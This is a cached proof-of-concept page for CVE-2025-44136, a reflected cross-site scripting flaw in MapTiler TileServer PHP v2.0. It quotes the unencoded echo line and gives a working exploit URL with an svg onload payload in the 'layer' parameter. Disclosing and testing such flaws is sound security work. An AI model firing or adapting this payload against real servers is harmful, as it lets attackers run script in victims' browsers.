CVE-2025-44136 PoC — TileServer PHP 安全漏洞

Source

https://github.com/mheranco/CVE-2025-44136

Associated Vulnerability

Title:TileServer PHP 安全漏洞 (CVE-2025-44136)
Description:TileServer PHP是MapTiler开源的一个文件夹托管软件。 TileServer PHP v2.0版本存在安全漏洞，该漏洞源于layer参数未经过HTML编码，可能导致跨站脚本攻击。

Readme

# CVE-2025-44136 
Unauthenticated XSS in MapTiler Tileserver-php v2.0.

## Description
MapTiler Tileserver-php v2.0 is vulnerable to Cross Site Scripting
(XSS). The GET parameter "layer" is reflected in an error message
without html encoding. This leads to XSS and allows an unauthenticated
attacker to execute arbitrary HTML or JavaScript code on a victim's
browser.

https://github.com/maptiler/tileserver-php/blob/d0fdeaec69688dc500b652a23669d724d7d53df2/tileserver.php#L409
```
 echo 'Server: Unknown or not specified dataset "' . $tileset . '"';
```
## PoC

http://host/tileserver.php/wmts/x/1/1/asd?Request=x&layer=%3csvg+onload=alert(document.domain)%3e

File Snapshot


 [4.0K]  /data/pocs/a753339f736769f8156a3b258130744a76ac3e04
└── [ 662]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!